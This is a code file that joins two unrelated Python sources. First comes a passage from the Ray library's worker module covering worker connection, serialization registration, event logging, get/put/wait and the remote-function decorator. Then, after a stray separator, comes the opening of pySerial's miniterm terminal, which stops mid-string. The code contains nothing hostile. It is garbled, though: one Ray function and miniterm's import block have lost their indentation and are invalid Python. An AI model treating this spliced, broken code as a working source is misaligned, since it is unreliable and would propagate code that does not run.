                    elif key.startswith(b"FunctionsToRun"):
                        with log_span("ray:import_function_to_run",
                                      worker=worker):
                            fetch_and_execute_function_to_run(key,
                                                              worker=worker)
                    elif key.startswith(b"ActorClass"):
                        # Keep track of the fact that this actor class has been
                        # exported so that we know it is safe to turn this
                        # worker into an actor of that class.
                        worker.imported_actor_classes.add(key)
                    # TODO(rkn): We may need to bring back the case of fetching
                    # actor classes here.
                    else:
                        raise Exception("This code should be unreachable.")
    except redis.ConnectionError:
        # When Redis terminates the listen call will throw a ConnectionError,
        # which we catch here.
        pass
def connect(info, object_id_seed=None, mode=WORKER_MODE, worker=global_worker):
    """Connect this worker to the local scheduler, to Plasma, and to Redis.

    Args:
        info (dict): A dictionary with address of the Redis server and the
            sockets of the plasma store, plasma manager, and local scheduler.
        object_id_seed: A seed to use to make the generation of object IDs
            deterministic.
        mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE,
            PYTHON_MODE, and SILENT_MODE.
        worker: The worker object to connect (defaults to the module-level
            global_worker).
    """
    check_main_thread()
    # Do some basic checking to make sure we didn't call ray.init twice.
    error_message = "Perhaps you called ray.init twice by accident?"
    assert not worker.connected, error_message
    assert worker.cached_functions_to_run is not None, error_message
    assert worker.cached_remote_functions_and_actors is not None, error_message

    # Initialize some fields.
    worker.worker_id = random_string()
    # All workers start out as non-actors. A worker can be turned into an actor
    # after it is created.
    worker.actor_id = NIL_ACTOR_ID
    worker.connected = True
    worker.set_mode(mode)

    # The worker.events field is used to aggregate logging information and
    # display it in the web UI. Note that Python lists protected by the GIL,
    # which is important because we will append to this field from multiple
    # threads.
    worker.events = []

    # If running Ray in PYTHON_MODE, there is no need to create call
    # create_worker or to start the worker service.
    if mode == PYTHON_MODE:
        return

    # Set the node IP address.
    worker.node_ip_address = info["node_ip_address"]
    worker.redis_address = info["redis_address"]

    # Create a Redis client.
    redis_ip_address, redis_port = info["redis_address"].split(":")
    worker.redis_client = redis.StrictRedis(host=redis_ip_address,
                                            port=int(redis_port))

    # For driver's check that the version information matches the version
    # information that the Ray cluster was started with.
    try:
        ray.services.check_version_info(worker.redis_client)
    except Exception as e:
        if mode in [SCRIPT_MODE, SILENT_MODE]:
            raise e
        elif mode == WORKER_MODE:
            traceback_str = traceback.format_exc()
            ray.utils.push_error_to_driver(worker.redis_client,
                                           "version_mismatch",
                                           traceback_str,
                                           driver_id=None)

    worker.lock = threading.Lock()

    # Check the RedirectOutput key in Redis and based on its value redirect
    # worker output and error to their own files.
    if mode == WORKER_MODE:
        # This key is set in services.py when Redis is started.
        redirect_worker_output_val = worker.redis_client.get("RedirectOutput")
        if (redirect_worker_output_val is not None and
                int(redirect_worker_output_val) == 1):
            redirect_worker_output = 1
        else:
            redirect_worker_output = 0
        if redirect_worker_output:
            log_stdout_file, log_stderr_file = services.new_log_files("worker",
                                                                      True)
            sys.stdout = log_stdout_file
            sys.stderr = log_stderr_file
            services.record_log_files_in_redis(info["redis_address"],
                                               info["node_ip_address"],
                                               [log_stdout_file,
                                                log_stderr_file])

    # Create an object for interfacing with the global state.
    global_state._initialize_global_state(redis_ip_address, int(redis_port))

    # Register the worker with Redis.
    if mode in [SCRIPT_MODE, SILENT_MODE]:
        # The concept of a driver is the same as the concept of a "job".
        # Register the driver/job with Redis here.
        import __main__ as main
        driver_info = {
            "node_ip_address": worker.node_ip_address,
            "driver_id": worker.worker_id,
            "start_time": time.time(),
            "plasma_store_socket": info["store_socket_name"],
            "plasma_manager_socket": info["manager_socket_name"],
            "local_scheduler_socket": info["local_scheduler_socket_name"]}
        driver_info["name"] = (main.__file__ if hasattr(main, "__file__")
                               else "INTERACTIVE MODE")
        worker.redis_client.hmset(b"Drivers:" + worker.worker_id, driver_info)
        if not worker.redis_client.exists("webui"):
            worker.redis_client.hmset("webui", {"url": info["webui_url"]})
        is_worker = False
    elif mode == WORKER_MODE:
        # Register the worker with Redis.
        worker_dict = {
            "node_ip_address": worker.node_ip_address,
            "plasma_store_socket": info["store_socket_name"],
            "plasma_manager_socket": info["manager_socket_name"],
            "local_scheduler_socket": info["local_scheduler_socket_name"]}
        if redirect_worker_output:
            worker_dict["stdout_file"] = os.path.abspath(log_stdout_file.name)
            worker_dict["stderr_file"] = os.path.abspath(log_stderr_file.name)
        worker.redis_client.hmset(b"Workers:" + worker.worker_id, worker_dict)
        is_worker = True
    else:
        raise Exception("This code should be unreachable.")

    # Create an object store client.
    # NOTE(review): 64 is presumably the plasma release delay — confirm
    # against the plasma.connect signature in use.
    worker.plasma_client = plasma.connect(info["store_socket_name"],
                                          info["manager_socket_name"],
                                          64)
    worker.local_scheduler_client = ray.local_scheduler.LocalSchedulerClient(
        info["local_scheduler_socket_name"], worker.worker_id, is_worker)

    # If this is a driver, set the current task ID, the task driver ID, and set
    # the task index to 0.
    if mode in [SCRIPT_MODE, SILENT_MODE]:
        # If the user provided an object_id_seed, then set the current task ID
        # deterministically based on that seed (without altering the state of
        # the user's random number generator). Otherwise, set the current task
        # ID randomly to avoid object ID collisions.
        numpy_state = np.random.get_state()
        if object_id_seed is not None:
            np.random.seed(object_id_seed)
        else:
            # Try to use true randomness.
            np.random.seed(None)
        worker.current_task_id = ray.local_scheduler.ObjectID(
            np.random.bytes(20))
        # When tasks are executed on remote workers in the context of multiple
        # drivers, the task driver ID is used to keep track of which driver is
        # responsible for the task so that error messages will be propagated to
        # the correct driver.
        worker.task_driver_id = ray.local_scheduler.ObjectID(worker.worker_id)
        # Reset the state of the numpy random number generator.
        np.random.set_state(numpy_state)
        # Set other fields needed for computing task IDs.
        worker.task_index = 0
        worker.put_index = 0

        # Create an entry for the driver task in the task table. This task is
        # added immediately with status RUNNING. This allows us to push errors
        # related to this driver task back to the driver. For example, if the
        # driver creates an object that is later evicted, we should notify the
        # user that we're unable to reconstruct the object, since we cannot
        # rerun the driver.
        nil_actor_counter = 0
        driver_task = ray.local_scheduler.Task(
            worker.task_driver_id,
            ray.local_scheduler.ObjectID(NIL_FUNCTION_ID),
            [],
            0,
            worker.current_task_id,
            worker.task_index,
            ray.local_scheduler.ObjectID(NIL_ACTOR_ID),
            ray.local_scheduler.ObjectID(NIL_ACTOR_ID),
            ray.local_scheduler.ObjectID(NIL_ACTOR_ID),
            ray.local_scheduler.ObjectID(NIL_ACTOR_ID),
            nil_actor_counter,
            False,
            [],
            {"CPU": 0})
        global_state._execute_command(
            driver_task.task_id(),
            "RAY.TASK_TABLE_ADD",
            driver_task.task_id().id(),
            TASK_STATUS_RUNNING,
            NIL_LOCAL_SCHEDULER_ID,
            driver_task.execution_dependencies_string(),
            0,
            ray.local_scheduler.task_to_string(driver_task))
        # Set the driver's current task ID to the task ID assigned to the
        # driver task.
        worker.current_task_id = driver_task.task_id()

    # Initialize the serialization library. This registers some classes, and so
    # it must be run before we export all of the cached remote functions.
    _initialize_serialization()

    # Start a thread to import exports from the driver or from other workers.
    # Note that the driver also has an import thread, which is used only to
    # import custom class definitions from calls to register_custom_serializer
    # that happen under the hood on workers.
    t = threading.Thread(target=import_thread, args=(worker, mode))
    # Making the thread a daemon causes it to exit when the main thread exits.
    t.daemon = True
    t.start()

    # If this is a driver running in SCRIPT_MODE, start a thread to print error
    # messages asynchronously in the background. Ideally the scheduler would
    # push messages to the driver's worker service, but we ran into bugs when
    # trying to properly shutdown the driver's worker service, so we are
    # temporarily using this implementation which constantly queries the
    # scheduler for new error messages.
    if mode == SCRIPT_MODE:
        t = threading.Thread(target=print_error_messages, args=(worker,))
        # Making the thread a daemon causes it to exit when the main thread
        # exits.
        t.daemon = True
        t.start()

    if mode in [SCRIPT_MODE, SILENT_MODE]:
        # Add the directory containing the script that is running to the Python
        # paths of the workers. Also add the current directory. Note that this
        # assumes that the directory structures on the machines in the clusters
        # are the same.
        script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
        current_directory = os.path.abspath(os.path.curdir)
        worker.run_function_on_all_workers(
            lambda worker_info: sys.path.insert(1, script_directory))
        worker.run_function_on_all_workers(
            lambda worker_info: sys.path.insert(1, current_directory))
        # TODO(rkn): Here we first export functions to run, then remote
        # functions. The order matters. For example, one of the functions to
        # run may set the Python path, which is needed to import a module used
        # to define a remote function. We may want to change the order to
        # simply be the order in which the exports were defined on the driver.
        # In addition, we will need to retain the ability to decide what the
        # first few exports are (mostly to set the Python path). Additionally,
        # note that the first exports to be defined on the driver will be the
        # ones defined in separate modules that are imported by the driver.
        # Export cached functions_to_run.
        for function in worker.cached_functions_to_run:
            worker.run_function_on_all_workers(function)
        # Export cached remote functions to the workers.
        for cached_type, info in worker.cached_remote_functions_and_actors:
            if cached_type == "remote_function":
                (function_id, func_name, func,
                 func_invoker, function_properties) = info
                export_remote_function(function_id, func_name, func,
                                       func_invoker, function_properties,
                                       worker)
            elif cached_type == "actor":
                (key, actor_class_info) = info
                ray.actor.publish_actor_class_to_key(key, actor_class_info,
                                                     worker)
            else:
                assert False, "This code should be unreachable."
    worker.cached_functions_to_run = None
    worker.cached_remote_functions_and_actors = None
def disconnect(worker=global_worker):
    """Disconnect this worker from the scheduler and object store."""
    # Clearing the cached exports means a later call to connect() will
    # re-export remote functions and actors. This matters mostly for the
    # tests, which connect and disconnect repeatedly.
    worker.cached_functions_to_run = []
    worker.cached_remote_functions_and_actors = []
    worker.serialization_context = pyarrow.SerializationContext()
    worker.connected = False
def _try_to_compute_deterministic_class_id(cls, depth=5):
"""Attempt to produce a deterministic class ID for a given class.
The goal here is for the class ID to be the same when this is run on
different worker processes. Pickling, loading, and pickling again seems to
produce more consistent results than simply pickling. This is a bit crazy
and could cause problems, in which case we should revert it and figure out
something better.
Args:
cls: The class to produce an ID for.
depth: The number of times to repeatedly try to load and dump the
string while trying to reach a fixed point.
Returns:
A class ID for this class. We attempt to make the class ID the same
when this function is run on different workers, but that is not
guaranteed.
Raises:
Exception: This could raise an exception if cloudpickle raises an
exception.
"""
# Pickling, loading, and pickling again seems to produce more consistent
# results than simply pickling. This is a bit
class_id = pickle.dumps(cls)
for _ in range(depth):
new_class_id = pickle.dumps(pickle.loads(class_id))
if new_class_id == class_id:
# We appear to have reached a fix point, so use this as the ID.
return hashlib.sha1(new_class_id).digest()
class_id = new_class_id
# We have not reached a fixed point, so we may end up with a different
# class ID for this custom class on each worker, which could lead to the
# same class definition being exported many many times.
print("WARNING: Could not produce a deterministic class ID for class "
"{}".format(cls), file=sys.stderr)
return hashlib.sha1(new_class_id).digest()
def register_custom_serializer(cls, use_pickle=False, use_dict=False,
                               serializer=None, deserializer=None,
                               local=False, worker=global_worker):
    """Enable serialization and deserialization for a particular class.

    This method runs the register_class function defined below on every worker,
    which will enable ray to properly serialize and deserialize objects of
    this class.

    Args:
        cls (type): The class that ray should serialize.
        use_pickle (bool): If true, then objects of this class will be
            serialized using pickle.
        use_dict: If true, then objects of this class be serialized turning
            their __dict__ fields into a dictionary. Must be False if
            use_pickle is true.
        serializer: The custom serializer to use. This should be provided if
            and only if use_pickle and use_dict are False.
        deserializer: The custom deserializer to use. This should be provided
            if and only if use_pickle and use_dict are False.
        local: True if the serializers should only be registered on the current
            worker. This should usually be False.
        worker: The worker used to broadcast the registration.

    Raises:
        Exception: An exception is raised if pickle=False and the class cannot
            be efficiently serialized by Ray. This can also raise an exception
            if use_dict is true and cls is not pickleable.
    """
    assert (serializer is None) == (deserializer is None), (
        "The serializer/deserializer arguments must both be provided or "
        "both not be provided."
    )
    use_custom_serializer = (serializer is not None)
    # Exactly one serialization strategy must be selected (bools sum as ints).
    assert use_custom_serializer + use_pickle + use_dict == 1, (
        "Exactly one of use_pickle, use_dict, or serializer/deserializer must "
        "be specified."
    )
    if use_dict:
        # Raise an exception if cls cannot be serialized efficiently by Ray.
        serialization.check_serializable(cls)
    if not local:
        # In this case, the class ID will be used to deduplicate the class
        # across workers. Note that cloudpickle unfortunately does not produce
        # deterministic strings, so these IDs could be different on different
        # workers. We could use something weaker like cls.__name__, however
        # that would run the risk of having collisions. TODO(rkn): We should
        # improve this.
        try:
            # Attempt to produce a class ID that will be the same on each
            # worker. However, determinism is not guaranteed, and the result
            # may be different on different workers.
            class_id = _try_to_compute_deterministic_class_id(cls)
        except Exception as e:
            # Include the underlying failure in the message so the original
            # cause is not silently discarded (it was previously unused).
            raise serialization.CloudPickleError("Failed to pickle class "
                                                 "'{}': {}".format(cls, e))
    else:
        # In this case, the class ID only needs to be meaningful on this worker
        # and not across workers.
        class_id = random_string()

    def register_class_for_serialization(worker_info):
        # TODO(rkn): We need to be more thoughtful about what to do if custom
        # serializers have already been registered for class_id. In some cases,
        # we may want to use the last user-defined serializers and ignore
        # subsequent calls to register_custom_serializer that were made by the
        # system.
        worker_info["worker"].serialization_context.register_type(
            cls, class_id, pickle=use_pickle, custom_serializer=serializer,
            custom_deserializer=deserializer)
    if not local:
        worker.run_function_on_all_workers(register_class_for_serialization)
    else:
        # Since we are pickling objects of this class, we don't actually need
        # to ship the class definition.
        register_class_for_serialization({"worker": worker})
class RayLogSpan(object):
    """An object used to enable logging a span of events with a with statement.

    Attributes:
        event_type (str): The type of the event being logged.
        contents: Additional information to log.
    """
    def __init__(self, event_type, contents=None, worker=global_worker):
        """Initialize a RayLogSpan object."""
        self.event_type = event_type
        self.contents = contents
        self.worker = worker

    def __enter__(self):
        """Log the beginning of a span event."""
        log(event_type=self.event_type,
            contents=self.contents,
            kind=LOG_SPAN_START,
            worker=self.worker)

    def __exit__(self, type, value, tb):
        """Log the end of a span event. Log any exception that occurred."""
        error_contents = None
        if type is not None:
            # The span terminated with an exception; record its details.
            error_contents = {"type": str(type),
                              "value": value,
                              "traceback": traceback.format_exc()}
        log(event_type=self.event_type,
            contents=error_contents,
            kind=LOG_SPAN_END,
            worker=self.worker)
def log_span(event_type, contents=None, worker=global_worker):
    """Return a RayLogSpan context manager for the given event type."""
    return RayLogSpan(event_type=event_type, contents=contents, worker=worker)
def log_event(event_type, contents=None, worker=global_worker):
    """Record a single point-in-time event in the local event buffer."""
    log(event_type, contents=contents, kind=LOG_POINT, worker=worker)
def log(event_type, kind, contents=None, worker=global_worker):
    """Log an event to the global state store.

    This adds the event to a buffer of events locally. The buffer can be
    flushed and written to the global state store by calling flush_log().

    Args:
        event_type (str): The type of the event.
        kind (int): Either LOG_POINT, LOG_SPAN_START, or LOG_SPAN_END. This is
            LOG_POINT if the event being logged happens at a single point in
            time. It is LOG_SPAN_START if we are starting to log a span of
            time, and it is LOG_SPAN_END if we are finishing logging a span of
            time.
        contents: More general data to store with the event.
    """
    # TODO(rkn): This code currently takes around half a microsecond. Since we
    # call it tens of times per task, this adds up. We will need to redo the
    # logging code, perhaps in C.
    if contents is None:
        contents = {}
    assert isinstance(contents, dict)
    # Stringify every key and value so the buffer holds only strings.
    stringified = {str(key): str(val) for key, val in contents.items()}
    # Only buffer the event on workers; a driver's event log never gets
    # flushed.
    if worker.mode == WORKER_MODE:
        worker.events.append((time.time(), event_type, kind, stringified))
def flush_log(worker=global_worker):
    """Send the logged worker events to the global state store."""
    key = b"event_log:" + worker.worker_id
    value = json.dumps(worker.events)
    worker.local_scheduler_client.log_event(key, value, time.time())
    # The buffered events are now handed off; start with an empty buffer.
    worker.events = []
def get(object_ids, worker=global_worker):
    """Get a remote object or a list of remote objects from the object store.

    This method blocks until the object corresponding to the object ID is
    available in the local object store. If this object is not in the local
    object store, it will be shipped from an object store that has it (once
    the object has been created). If object_ids is a list, then the objects
    corresponding to each object in the list will be returned.

    Args:
        object_ids: Object ID of the object to get or a list of object IDs to
            get.

    Returns:
        A Python object or a list of Python objects.
    """
    check_connected(worker)
    with log_span("ray:get", worker=worker):
        check_main_thread()
        if worker.mode == PYTHON_MODE:
            # In PYTHON_MODE, ray.get is the identity operation (the input
            # is already a value, not an object ID).
            return object_ids
        # Normalize the single-ID case to a one-element list so both cases
        # share one fetch-and-check path.
        got_list = isinstance(object_ids, list)
        ids = object_ids if got_list else [object_ids]
        values = worker.get_object(ids)
        for index, value in enumerate(values):
            if isinstance(value, RayTaskError):
                # The task that created this object failed; propagate the
                # error message here.
                raise RayGetError(ids[index], value)
        return values if got_list else values[0]
def put(value, worker=global_worker):
    """Store an object in the object store.

    Args:
        value: The Python object to be stored.

    Returns:
        The object ID assigned to this value.
    """
    check_connected(worker)
    with log_span("ray:put", worker=worker):
        check_main_thread()
        if worker.mode == PYTHON_MODE:
            # In PYTHON_MODE, ray.put is the identity operation.
            return value
        # Derive a deterministic ID from the current task and put counter.
        put_id = worker.local_scheduler_client.compute_put_id(
            worker.current_task_id, worker.put_index)
        worker.put_object(put_id, value)
        worker.put_index += 1
        return put_id
def wait(object_ids, num_returns=1, timeout=None, worker=global_worker):
    """Return a list of IDs that are ready and a list of IDs that are not.

    If timeout is set, the function returns either when the requested number
    of IDs are ready or when the timeout is reached, whichever occurs first.
    If it is not set, the function simply waits until that number of objects
    is ready and returns that exact number of object_ids.

    Args:
        object_ids (List[ObjectID]): List of object IDs for objects that may
            or may not be ready. Note that these IDs must be unique.
        num_returns (int): The number of object IDs that should be returned.
        timeout (int): The maximum amount of time in milliseconds to wait
            before returning.

    Returns:
        A list of object IDs that are ready and a list of the remaining object
            IDs.
    """
    # Validate the argument shape before doing anything else.
    if isinstance(object_ids, ray.local_scheduler.ObjectID):
        raise TypeError(
            "wait() expected a list of ObjectID, got a single ObjectID")
    if not isinstance(object_ids, list):
        raise TypeError("wait() expected a list of ObjectID, got {}".format(
            type(object_ids)))
    if worker.mode != PYTHON_MODE:
        for object_id in object_ids:
            if not isinstance(object_id, ray.local_scheduler.ObjectID):
                raise TypeError(
                    "wait() expected a list of ObjectID, "
                    "got list containing {}".format(type(object_id)))
    check_connected(worker)
    with log_span("ray:wait", worker=worker):
        check_main_thread()
        if worker.mode == PYTHON_MODE:
            # In PYTHON_MODE everything executed eagerly, so every object is
            # already "ready".
            return object_ids[:num_returns], object_ids[num_returns:]
        if not object_ids:
            # TODO(rkn): This is a temporary workaround for
            # https://github.com/ray-project/ray/issues/997. However, it
            # should be fixed in Arrow instead of here.
            return [], []
        # Translate to plasma IDs, wait, then translate the results back.
        plasma_ids = [plasma.ObjectID(oid.id()) for oid in object_ids]
        if timeout is None:
            timeout = 2 ** 30
        ready, remaining = worker.plasma_client.wait(plasma_ids,
                                                     timeout,
                                                     num_returns)
        make_id = ray.local_scheduler.ObjectID
        ready = [make_id(oid.binary()) for oid in ready]
        remaining = [make_id(oid.binary()) for oid in remaining]
        return ready, remaining
def _submit_task(function_id, *args, **kwargs):
    """This is a wrapper around worker.submit_task.

    We use this wrapper so that in the remote decorator, we can call
    _submit_task instead of worker.submit_task. The difference is that when we
    attempt to serialize remote functions, we don't attempt to serialize the
    worker object, which cannot be serialized.
    """
    worker = global_worker
    return worker.submit_task(function_id, *args, **kwargs)
def _mode(worker=global_worker):
    """This is a wrapper around worker.mode.

    We use this wrapper so that in the remote decorator, we can call _mode()
    instead of worker.mode. The difference is that when we attempt to
    serialize remote functions, we don't attempt to serialize the worker
    object, which cannot be serialized.
    """
    current_mode = worker.mode
    return current_mode
def export_remote_function(function_id, func_name, func, func_invoker,
                           function_properties, worker=global_worker):
    """Export a remote function definition to the workers via Redis.

    Args:
        function_id: The ID under which the function is registered.
        func_name: Fully qualified name ("module.function") of the function.
        func: The actual function to pickle and export.
        func_invoker: The wrapper callers use; temporarily installed as a
            global so the pickled function can reference itself.
        function_properties: Properties (num_return_vals, resources,
            max_calls) stored for this driver/function pair.
        worker: The worker performing the export.

    Raises:
        Exception: If called from anything other than a driver.
    """
    check_main_thread()
    # Only a driver (script or silent mode) is allowed to export.
    if _mode(worker) not in [SCRIPT_MODE, SILENT_MODE]:
        raise Exception("export_remote_function can only be called on a "
                        "driver.")
    worker.function_properties[
        worker.task_driver_id.id()][function_id.id()] = function_properties
    task_driver_id = worker.task_driver_id
    key = b"RemoteFunction:" + task_driver_id.id() + b":" + function_id.id()
    # Work around limitations of Python pickling: remember whether the
    # function's own name is already bound in its module globals so the
    # binding can be restored afterwards.
    func_name_global_valid = func.__name__ in func.__globals__
    func_name_global_value = func.__globals__.get(func.__name__)
    # Allow the function to reference itself as a global variable
    if not is_cython(func):
        func.__globals__[func.__name__] = func_invoker
    try:
        pickled_func = pickle.dumps(func)
    finally:
        # Undo our changes
        if func_name_global_valid:
            func.__globals__[func.__name__] = func_name_global_value
        else:
            # NOTE(review): if is_cython(func) was true the global was never
            # installed above, so this del could raise KeyError — confirm
            # Cython functions cannot reach this branch.
            del func.__globals__[func.__name__]
    # Publish the serialized function plus metadata, then notify workers by
    # pushing the key onto the "Exports" list.
    worker.redis_client.hmset(key, {
        "driver_id": worker.task_driver_id.id(),
        "function_id": function_id.id(),
        "name": func_name,
        "module": func.__module__,
        "function": pickled_func,
        "num_return_vals": function_properties.num_return_vals,
        "resources": json.dumps(function_properties.resources),
        "max_calls": function_properties.max_calls})
    worker.redis_client.rpush("Exports", key)
def in_ipython():
    """Return true if we are in an IPython interpreter and false otherwise."""
    # IPython injects __IPYTHON__ into the builtins; a plain interpreter
    # raises NameError when it is referenced.
    try:
        __IPYTHON__  # noqa: F821
    except NameError:
        return False
    return True
def compute_function_id(func_name, func):
    """Compute an function ID for a function.

    Args:
        func_name: The name of the function (this includes the module name
            plus the function name).
        func: The actual function.

    Returns:
        This returns the function ID.
    """
    hasher = hashlib.sha1()
    # The function name always contributes to the hash.
    hasher.update(func_name.encode("ascii"))
    # When running a script or inside IPython, the source code is accessible
    # and is mixed into the hash as well. In a plain interpreter, or for
    # built-ins (e.g. Cython), the source is not accessible and is skipped.
    import __main__ as main
    source_may_be_available = hasattr(main, "__file__") or in_ipython()
    if source_may_be_available and inspect.isfunction(func):
        hasher.update(inspect.getsource(func).encode("ascii"))
    # Compute the function ID.
    digest = hasher.digest()
    assert len(digest) == 20
    return FunctionID(digest)
def remote(*args, **kwargs):
    """This decorator is used to define remote functions and to define actors.

    Args:
        num_return_vals (int): The number of object IDs that a call to this
            function should return.
        num_cpus (int): The number of CPUs needed to execute this function.
        num_gpus (int): The number of GPUs needed to execute this function.
        resources: A dictionary mapping resource name to the required quantity
            of that resource.
        max_calls (int): The maximum number of tasks of this kind that can be
            run on a worker before the worker needs to be restarted.
        checkpoint_interval (int): The number of tasks to run between
            checkpoints of the actor state.
    """
    # Captured by the nested closures below.
    worker = global_worker
    # Builds the actual decorator once the keyword arguments are resolved.
    def make_remote_decorator(num_return_vals, num_cpus, num_gpus, resources,
                              max_calls, checkpoint_interval, func_id=None):
        def remote_decorator(func_or_class):
            # Plain (or Cython) functions become remote functions; classes
            # become actors; anything else is rejected below.
            if inspect.isfunction(func_or_class) or is_cython(func_or_class):
                # Set the remote function default resources.
                resources["CPU"] = (DEFAULT_REMOTE_FUNCTION_CPUS
                                    if num_cpus is None else num_cpus)
                resources["GPU"] = (DEFAULT_REMOTE_FUNCTION_GPUS
                                    if num_gpus is None else num_gpus)
                function_properties = FunctionProperties(
                    num_return_vals=num_return_vals,
                    resources=resources,
                    max_calls=max_calls)
                return remote_function_decorator(func_or_class,
                                                 function_properties)
            if inspect.isclass(func_or_class):
                # Set the actor default resources.
                if num_cpus is None and num_gpus is None and resources == {}:
                    # In the default case, actors acquire no resources for
                    # their lifetime, and actor methods will require 1 CPU.
                    resources["CPU"] = DEFAULT_ACTOR_CREATION_CPUS_SIMPLE_CASE
                    actor_method_cpus = DEFAULT_ACTOR_METHOD_CPUS_SIMPLE_CASE
                else:
                    # If any resources are specified, then all resources are
                    # acquired for the actor's lifetime and no resources are
                    # associated with methods.
                    resources["CPU"] = (
                        DEFAULT_ACTOR_CREATION_CPUS_SPECIFIED_CASE
                        if num_cpus is None else num_cpus)
                    resources["GPU"] = (
                        DEFAULT_ACTOR_CREATION_GPUS_SPECIFIED_CASE
                        if num_gpus is None else num_gpus)
                    actor_method_cpus = (
                        DEFAULT_ACTOR_METHOD_CPUS_SPECIFIED_CASE)
                return worker.make_actor(func_or_class, resources,
                                         checkpoint_interval,
                                         actor_method_cpus)
            raise Exception("The @ray.remote decorator must be applied to "
                            "either a function or to a class.")
        def remote_function_decorator(func, function_properties):
            func_name = "{}.{}".format(func.__module__, func.__name__)
            if func_id is None:
                function_id = compute_function_id(func_name, func)
            else:
                function_id = func_id
            def func_call(*args, **kwargs):
                """This runs immediately when a remote function is called."""
                return _submit(args=args, kwargs=kwargs)
            def _submit(args=None, kwargs=None, num_return_vals=None,
                        num_cpus=None, num_gpus=None, resources=None):
                """An experimental alternate way to submit remote functions."""
                check_connected()
                check_main_thread()
                kwargs = {} if kwargs is None else kwargs
                # function_signature is assigned later in the enclosing scope;
                # the closure only reads it here, at call time.
                args = signature.extend_args(function_signature, args, kwargs)
                if _mode() == PYTHON_MODE:
                    # In PYTHON_MODE, remote calls simply execute the function.
                    # We copy the arguments to prevent the function call from
                    # mutating them and to match the usual behavior of
                    # immutable remote objects.
                    result = func(*copy.deepcopy(args))
                    return result
                object_ids = _submit_task(function_id, args,
                                          num_return_vals=num_return_vals,
                                          num_cpus=num_cpus, num_gpus=num_gpus,
                                          resources=resources)
                # NOTE: with zero return values this falls through and
                # implicitly returns None.
                if len(object_ids) == 1:
                    return object_ids[0]
                elif len(object_ids) > 1:
                    return object_ids
            def func_executor(arguments):
                """This gets run when the remote function is executed."""
                result = func(*arguments)
                return result
            def func_invoker(*args, **kwargs):
                """This is used to invoke the function."""
                raise Exception("Remote functions cannot be called directly. "
                                "Instead of running '{}()', try '{}.remote()'."
                                .format(func_name, func_name))
            # Attach the callable entry points to the invoker stub.
            func_invoker.remote = func_call
            func_invoker._submit = _submit
            func_invoker.executor = func_executor
            func_invoker.is_remote = True
            func_name = "{}.{}".format(func.__module__, func.__name__)
            func_invoker.func_name = func_name
            if sys.version_info >= (3, 0) or is_cython(func):
                func_invoker.__doc__ = func.__doc__
            else:
                func_invoker.func_doc = func.func_doc
            signature.check_signature_supported(func)
            function_signature = signature.extract_signature(func)
            # Everything ready - export the function
            if worker.mode in [SCRIPT_MODE, SILENT_MODE]:
                export_remote_function(function_id, func_name, func,
                                       func_invoker, function_properties)
            elif worker.mode is None:
                # Not connected yet; cache the definition so connect() can
                # export it later.
                worker.cached_remote_functions_and_actors.append(
                    ("remote_function", (function_id, func_name, func,
                                         func_invoker, function_properties)))
            return func_invoker
        return remote_decorator
    # Handle resource arguments
    num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
    num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
    resources = kwargs.get("resources", {})
    if not isinstance(resources, dict):
        raise Exception("The 'resources' keyword argument must be a "
                        "dictionary, but received type {}."
                        .format(type(resources)))
    assert "CPU" not in resources, "Use the 'num_cpus' argument."
    assert "GPU" not in resources, "Use the 'num_gpus' argument."
    # Handle other arguments.
    num_return_vals = (kwargs["num_return_vals"] if "num_return_vals"
                       in kwargs else 1)
    max_calls = kwargs["max_calls"] if "max_calls" in kwargs else 0
    checkpoint_interval = (kwargs["checkpoint_interval"]
                           if "checkpoint_interval" in kwargs else -1)
    # On a worker, a function_id may be supplied explicitly (the definition
    # was exported by a driver).
    if _mode() == WORKER_MODE:
        if "function_id" in kwargs:
            function_id = kwargs["function_id"]
            return make_remote_decorator(num_return_vals, num_cpus, num_gpus,
                                         resources, max_calls,
                                         checkpoint_interval, function_id)
    if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
        # This is the case where the decorator is just @ray.remote.
        return make_remote_decorator(
            num_return_vals, num_cpus, num_gpus, resources,
            max_calls, checkpoint_interval)(args[0])
    else:
        # This is the case where the decorator is something like
        # @ray.remote(num_return_vals=2).
        error_string = ("The @ray.remote decorator must be applied either "
                        "with no arguments and no parentheses, for example "
                        "'@ray.remote', or it must be applied using some of "
                        "the arguments 'num_return_vals', 'resources', "
                        "or 'max_calls', like "
                        "'@ray.remote(num_return_vals=2, "
                        "resources={\"GPU\": 1})'.")
        assert len(args) == 0 and len(kwargs) > 0, error_string
        for key in kwargs:
            assert key in ["num_return_vals", "num_cpus", "num_gpus",
                           "resources", "max_calls",
                           "checkpoint_interval"], error_string
        assert "function_id" not in kwargs
        return make_remote_decorator(num_return_vals, num_cpus, num_gpus,
                                     resources, max_calls, checkpoint_interval)
|
miniterm.py | #!/usr/bin/env python
# Very simple serial terminal
# (C)2002-2011 Chris Liechti <cliechti@gmx.net>
# Input characters are sent directly (only LF -> CR/LF/CRLF translation is
# done), received characters are displayed as is (or escaped trough pythons
# repr, useful for debug purposes)
import sys, os, serial, threading
try:
from serial.tools.list_ports import comports
except ImportError:
comports = None
EXITCHARCTER = serial.to_bytes([0x1d]) # GS/CTRL+]
MENUCHARACTER = serial.to_bytes([0x14]) # Menu: CTRL+T
DEFAULT_PORT = None
DEFAULT_BAUDRATE = 9600
DEFAULT_RTS = None
DEFAULT_DTR = None
def key_description(character):
    """generate a readable description for a key"""
    code = ord(character)
    if code >= 32:
        return repr(character)
    # Control characters map to Ctrl+<letter>, e.g. 0x01 -> Ctrl+A.
    return 'Ctrl+%c' % (ord('@') + code)
# help text, starts with blank line! it's a function so that the current values
# for the shortcut keys is used and not the value at program start
def get_help_text():
    """Return the menu help screen rendered with the current key bindings."""
    # Built on every call so the text reflects the shortcut keys in effect
    # now, not their values at program start.
    bindings = {
        'version': getattr(serial, 'VERSION', 'unknown version'),
        'exit': key_description(EXITCHARCTER),
        'menu': key_description(MENUCHARACTER),
        'rts': key_description('\x12'),
        'repr': key_description('\x01'),
        'dtr': key_description('\x04'),
        'lfm': key_description('\x0c'),
        'break': key_description('\x02'),
        'echo': key_description('\x05'),
        'info': key_description('\x09'),
        'upload': key_description('\x15'),
        'itself': key_description(MENUCHARACTER),
        'exchar': key_description(EXITCHARCTER),
    }
    return """
--- pySerial (%(version)s) - miniterm - help
---
